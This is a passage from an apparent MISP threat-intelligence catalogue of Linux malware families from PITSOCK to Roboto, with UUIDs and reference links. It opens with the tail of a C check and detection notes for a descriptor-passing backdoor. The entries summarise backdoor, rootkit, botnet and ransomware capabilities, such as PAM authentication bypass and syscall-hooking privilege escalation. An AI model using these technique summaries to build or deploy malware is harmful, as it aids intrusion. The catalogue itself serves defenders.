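        result = (n == (ssize_t)len && memcmp(got, payload, len) == 0) ? 0 : -1;
    }
    close(client[0]); close(client[1]); close(chan[0]); close(chan[1]);
    return result;
}
```

Because the descriptor is passed rather than proxied, the backdoor process ends up holding a descriptor for the same TCP connection as the web process, and the web process never sees the magic-prefixed bytes as a request. Practical checks on a suspect appliance are therefore per-process descriptor listings (for example ls -l /proc/PID/fd for the web server and any unexpected process sharing its sockets) and the presence of the named Unix sockets Mandiant documents for these families.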
Internal MISP references
UUID c7c64576-526e-420c-9ec8-d6b899014c89 which can be used as unique global reference for PITSOCK in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Plague
According to Nextron Systems, this is an implant built as a malicious PAM (Pluggable Authentication Module), enabling attackers to silently bypass system authentication and gain persistent SSH access.
Internal MISP references
UUID 47988844-818c-4a59-a089-fdd6c10e7a3c which can be used as unique global reference for Plague in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PLEAD (ELF)
Internal MISP references
UUID de3c14aa-f9f4-4071-8e6e-a2c16a3394ad which can be used as unique global reference for PLEAD (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/ - webarchive
- https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PolarEdge
According to Sekoia, this is a form of TLS backdoor containing pre-defined commands. Their investigation initially identified Cisco routers as a target, but they also uncovered other payloads from the same family targeting different devices, notably Asus, QNAP and Synology. A working hypothesis suggests that devices compromised with PolarEdge could be used as Operational Relay Boxes (ORB) to facilitate offensive cyber operations.
Internal MISP references
UUID 30e97f5e-69d8-48f4-93b9-cc0a33de7db6 which can be used as unique global reference for PolarEdge in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.polaredge - webarchive
- https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/ - webarchive
- https://blog.xlab.qianxin.com/smoking-gun-uncovered-rpx-relay-at-polaredges-core-exposed/ - webarchive
- https://censys.com/blog/2025-state-of-the-internet-digging-into-residential-proxy-infrastructure - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Poseidon (ELF)
Part of Mythic C2, written in Golang.
Internal MISP references
UUID ad796632-2595-4ae5-a563-b92197210d61 which can be used as unique global reference for Poseidon (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.poseidon - webarchive
- https://brandefense.io/blog/apt-36-campaign-poseidon-malware-technical-analysis/ - webarchive
- https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/ - webarchive
- https://github.com/MythicAgents/poseidon - webarchive
- https://cert.gov.ua/article/6123309 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PRISM
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PRISM.
| Known Synonyms |
|---|
waterdrop |
Internal MISP references
UUID 9a4a866b-84a9-4778-8de8-2780a27c0597 which can be used as unique global reference for PRISM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PrivetSanya
Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.
Internal MISP references
UUID 41e5aafb-5847-421e-813d-627414ee31bb which can be used as unique global reference for PrivetSanya in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Prometei (ELF)
Internal MISP references
UUID b6899bda-54e9-4953-8af5-22af39776b69 which can be used as unique global reference for Prometei (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://cujo.com/iot-malware-journals-prometei-linux/ - webarchive
- https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html - webarchive
- https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html - webarchive
- https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://twitter.com/IntezerLabs/status/1338480158249013250 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pro-Ocean
Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.
Internal MISP references
UUID aa918c10-e5c7-4abd-b8c0-3c938a6675f5 which can be used as unique global reference for Pro-Ocean in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean - webarchive
- https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/ - webarchive
- https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PumaBot
Internal MISP references
UUID 5b7cb40f-38c3-4741-a288-e3b3b62ee2ae which can be used as unique global reference for PumaBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PUMAKIT
According to Elastic, PUMAKIT is a sophisticated loadable kernel module (LKM) rootkit that employs advanced stealth mechanisms to hide its presence and maintain communication with command-and-control servers.
The rootkit component, referenced by the malware authors as "PUMA", employs an internal Linux function tracer (ftrace) to hook 18 different syscalls and several kernel functions, enabling it to manipulate core system behaviors. Unique methods are used to interact with PUMA, including using the rmdir() syscall for privilege escalation and specialized commands for extracting configuration and runtime information.
Key functionalities of the kernel module include privilege escalation, hiding files and directories, concealing itself from system tools, anti-debugging measures, and establishing communication with command-and-control (C2) servers.
There is also an accompanying userland SO rootkit internally referred to as Kitsune.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PUMAKIT.
| Known Synonyms |
|---|
Kitsune |
PUMA |
Internal MISP references
UUID 8e589764-4941-4078-a793-71c0a19b2d9f which can be used as unique global reference for PUMAKIT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
pupy (ELF)
Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.
Internal MISP references
UUID 92a1288f-cc4d-47ca-8399-25fe5a39cf2d which can be used as unique global reference for pupy (ELF) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PWNLNX
Internal MISP references
UUID 401ebc95-1d41-4712-94ad-8d8993814d3d which can be used as unique global reference for PWNLNX in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Qilin
Qilin ransomware, initially observed in July 2022 under the name “Agenda,” operates on a Ransomware-as-a-Service (RaaS) model. This model allows core developers to provide their malicious software and infrastructure to affiliates in exchange for a percentage of the profits generated from attacks. The name “Qilin” references a Chinese mythological creature symbolizing power and prosperity, a fitting metaphor for the group’s perceived influence and financial objectives. Despite the Chinese name, the group is linked to Russian-speaking cybercriminals, often recruiting affiliates on Russian-language forums and notably excluding Commonwealth of Independent States (CIS) countries from its targets.
Internal MISP references
UUID d97af6c5-640f-46b4-943c-0e8940f8011e which can be used as unique global reference for Qilin in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.qilin - webarchive
- https://tehtris.com/en/blog/rage-against-the-powershell-qilin-in-the-name/ - webarchive
- https://www.bleepingcomputer.com/news/security/linux-version-of-qilin-ransomware-focuses-on-vmware-esxi/ - webarchive
- https://medium.com/@raghavtiresearch/qilin-ransomware-as-a-service-threat-analysis-and-strategic-outlook-daf8bd6808b5 - webarchive
- https://x.com/MsftSecIntel/status/1897738961348374621 - webarchive
- https://twitter.com/malwrhunterteam/status/1724521714845937822 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QNAPCrypt
The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:
- The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.
- Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.
- Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QNAPCrypt.
| Known Synonyms |
|---|
eCh0raix |
Internal MISP references
UUID a0b12e5f-0257-41f1-beda-001ad944c4ca which can be used as unique global reference for QNAPCrypt in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/ - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/ - webarchive
- https://www.qnap.com/en/security-advisory/QSA-20-02 - webarchive
- https://www.ibm.com/downloads/cas/Z81AVOY7 - webarchive
- https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/ - webarchive
- https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf - webarchive
- https://www.anomali.com/blog/the-ech0raix-ransomware - webarchive
- https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt - webarchive
- https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/ - webarchive
- https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QSnatch
The malware infects QNAP NAS devices, persists via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes.
Internal MISP references
UUID 48389957-30e2-4747-b4c6-8b8a9f15250f which can be used as unique global reference for QSnatch in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch - webarchive
- https://bin.re/blog/the-dga-of-qsnatch/ - webarchive
- https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices - webarchive
- https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf - webarchive
- https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-209a - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QUIETEXIT
Mandiant observed this backdoor being used by UNC3524. It is based on the open-source Dropbear SSH source code.
Internal MISP references
UUID 6a5ab9ca-944c-4187-bdef-308516745d18 which can be used as unique global reference for QUIETEXIT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
r2r2
Internal MISP references
UUID 759f8590-a049-4c14-be8a-e6605e2cd43d which can be used as unique global reference for r2r2 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RagnarLocker (ELF)
Internal MISP references
UUID 5f96787e-fc9f-486b-a15f-f46c8179a4d5 which can be used as unique global reference for RagnarLocker (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ragnarlocker - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://twitter.com/malwrhunterteam/status/1475568201673105409 - webarchive
- https://techcrunch.com/2023/10/20/ragnarlocker-ransomware-dark-web-portal-seized-in-international-sting/?guccounter=1 - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rakos
Internal MISP references
UUID 4592384c-48a7-4e16-b492-7add50a7d2f5 which can be used as unique global reference for Rakos in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RansomEXX (ELF)
According to SentinelOne, RansomEXX (aka Defray, Defray777), a multi-pronged extortion threat, has been observed in the wild since late 2020. RansomEXX is associated with attacks against the Texas Department of Transportation, Groupe Atlantic, and several other large enterprises. There are Windows and Linux variants of this malware family, and they are known for their limited and exclusive targeting.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomEXX (ELF).
| Known Synonyms |
|---|
Defray777 |
Internal MISP references
UUID 946814a1-957c-48ce-9068-fdef24a025bf which can be used as unique global reference for RansomEXX (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx - webarchive
- https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/ - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195 - webarchive
- https://securityintelligence.com/x-force/ransomexx-upgrades-rust/ - webarchive
- https://www.sentinelone.com/anthology/ransomexx/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.youtube.com/watch?v=qxPXxWMI2i4 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/ - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.ic3.gov/Media/News/2021/211101.pdf - webarchive
- https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RansomExx2
According to IBM Security X-Force, this is a new but functionally very similar version of RansomExx, fully rewritten in Rust and internally referred to as RansomExx2.
Internal MISP references
UUID c6d750d5-fa47-4fcb-9d24-2682036fc6e5 which can be used as unique global reference for RansomExx2 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RapperBot
A Mirai derivative brute-forcing SSH servers.
Internal MISP references
UUID 914c94eb-38e2-4cb8-a62b-21fbe9c48496 which can be used as unique global reference for RapperBot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.rapper_bot - webarchive
- https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery - webarchive
- https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks - webarchive
- https://www.wsj.com/tech/oregon-man-accused-of-operating-one-of-most-powerful-attack-botnets-ever-seen-380b2caf?mod=RSSMSN - webarchive
- https://socradar.io/linux-malware-rapperbot-brute-forcing-ssh-servers/ - webarchive
- https://www.bitsight.com/blog/rapperbot-infection-ddos-split-second - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RaspberryPiBotnet
Internal MISP references
UUID 8dee025b-2233-4cd8-af02-fcdcd40b378f which can be used as unique global reference for RaspberryPiBotnet in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
rat_hodin
Internal MISP references
UUID 6aacf515-de49-4afc-a135-727c9beaab0b which can be used as unique global reference for rat_hodin in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
rbs_srv
Internal MISP references
UUID a08d9f8b-2cc5-48c2-8cce-ee713bcdc4b7 which can be used as unique global reference for rbs_srv in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RedTail
RedTail is a cryptomining malware, which is based on the open-source XMRIG mining software. It is being spread via known vulnerabilities such as:
- CVE-2024-3400
- CVE-2023-46805
- CVE-2024-21887
- CVE-2023-1389
- CVE-2022-22954
- CVE-2018-20062
Internal MISP references
UUID ba89a509-ff8e-446b-867c-7f15efe0477f which can be used as unique global reference for RedTail in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RedXOR
RedXOR is a sophisticated backdoor targeting Linux systems disguised as polkit daemon and utilizing network data encoding based on XOR. Believed to be developed by Chinese nation-state actors, this malware shows similarities to other malware associated with the Winnti umbrella threat group.
RedXOR uses various techniques such as open-source LKM rootkits, Python pty shell, and network data encoding with XOR. It also employs persistence methods and communication with a Command and Control server over HTTP.
The malware can execute various commands including system information collection, updates, shell commands, and network tunneling.
Internal MISP references
UUID 421b2ec7-d4e6-4fc8-9bd3-55fe26337aae which can be used as unique global reference for RedXOR in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RedAlert Ransomware
Ransomware that targets Linux VMware ESXi servers. Encryption procedure uses the NTRUEncrypt public-key encryption algorithm.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedAlert Ransomware.
| Known Synonyms |
|---|
N13V |
Internal MISP references
UUID 12137c8d-d3f4-44fe-b25e-2fb5f90cecce which can be used as unique global reference for RedAlert Ransomware in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rekoobe
A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm.
Some versions have their configuration stored within the .data section, using RC4 to encrypt the details.
Configuration options include C2 IP and Port, as well as defence evasion details for changing the process name.
Internal MISP references
UUID 48b9a9fd-4c1a-428a-acc0-40b1a3fa7590 which can be used as unique global reference for Rekoobe in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe - webarchive
- https://sansec.io/research/rekoobe-fishpig-magento - webarchive
- https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/ - webarchive
- https://blog.techevo.uk/analysis/linux/2024/11/30/rekoobe-apt31-linux-backdoor.html - webarchive
- https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/ - webarchive
- https://twitter.com/billyleonard/status/1458531997576572929 - webarchive
- https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/ - webarchive
- https://hunt.io/blog/rekoobe-backdoor-discovered-in-open-directory-possibly-targeting-tradingview-users - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt - webarchive
- https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ - webarchive
- https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/ - webarchive
- https://vms.drweb.com/virus/?i=7754026&lng=en - webarchive
- https://asec.ahnlab.com/en/55229/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
reptile
Internal MISP references
UUID 934478a1-1243-4c26-8360-be3d01ae193e which can be used as unique global reference for reptile in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://github.com/f0rb1dd3n/Reptile - webarchive
- https://dfir.ch/posts/reptile_launcher/ - webarchive
- https://asec.ahnlab.com/en/55785/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
REvil (ELF)
ELF version of win.revil targeting VMware ESXi hypervisors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REvil (ELF).
| Known Synonyms |
|---|
REvix |
Internal MISP references
UUID d9d76456-01a3-4dcd-afc2-87529e00c1ba which can be used as unique global reference for REvil (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil - webarchive
- https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/ - webarchive
- https://twitter.com/IntezerLabs/status/1452980772953071619 - webarchive
- https://github.com/f0wl/REconfig-linux - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa - webarchive
- https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released - webarchive
- https://twitter.com/VK_Intel/status/1409601311092490248?s=20 - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/ - webarchive
- https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/ - webarchive
- https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya - webarchive
- https://analyst1.com/file-assets/History-of-REvil.pdf - webarchive
- https://ke-la.com/will-the-revils-story-finally-be-over/ - webarchive
- https://malienist.medium.com/revix-linux-ransomware-d736956150d0 - webarchive
- https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20 - webarchive
- https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://angle.ankura.com/post/102hcny/revix-linux-ransomware - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf - webarchive
- https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5 - webarchive
- https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - webarchive
- https://www.flashpoint-intel.com/blog/revil-disappears-again/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom - webarchive
- https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/ - webarchive
- https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin - webarchive
- https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/ - webarchive
- https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021 - webarchive
- http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html - webarchive
- https://www.bbc.com/news/technology-59297187 - webarchive
- https://www.youtube.com/watch?v=ptbNMlWxYnE - webarchive
- https://threatpost.com/ransomware-revil-sites-disappears/167745/ - webarchive
- https://twitter.com/VK_Intel/status/1409601311092490248 - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf - webarchive
- https://www.youtube.com/watch?v=mDUMpYAOMOo - webarchive
- https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ - webarchive
- https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/ - webarchive
- https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/ - webarchive
- https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf - webarchive
- https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo - webarchive
- https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/ - webarchive
- https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf - webarchive
- https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide - webarchive
- https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend - webarchive
- https://home.treasury.gov/news/press-releases/jy0471 - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version - webarchive
- https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rex
Internal MISP references
UUID 49639ff5-e0be-4b6a-850b-d5d8dd37e62b which can be used as unique global reference for Rex in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RHOMBUS
Internal MISP references
UUID af886910-9a0b-478e-b53d-54c8a103acb4 which can be used as unique global reference for RHOMBUS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Rhysida (ELF)
Internal MISP references
UUID 1dbd7cbb-960d-4ef4-9520-1748fb7cd4c6 which can be used as unique global reference for Rhysida (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhysida - webarchive
- https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2025-0130.pdf - webarchive
- https://www.shadowstackre.com/analysis/rhysida - webarchive
- https://twitter.com/malwrhunterteam/status/1724165711356993736 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Roboto
P2P botnet discovered by Netlab 360. It infects Linux servers through the Webmin remote code execution vulnerability CVE-2019-15107, which lets an attacker run code as root on unpatched Webmin versions. Based on the Netlab 360 analysis, the bot implements seven main functions: reverse shell, self-uninstall, gathering process network information, gathering bot information, executing system commands, running encrypted files fetched from URLs, and four DDoS attack methods (ICMP flood, HTTP flood, TCP flood and UDP flood).
Internal MISP references
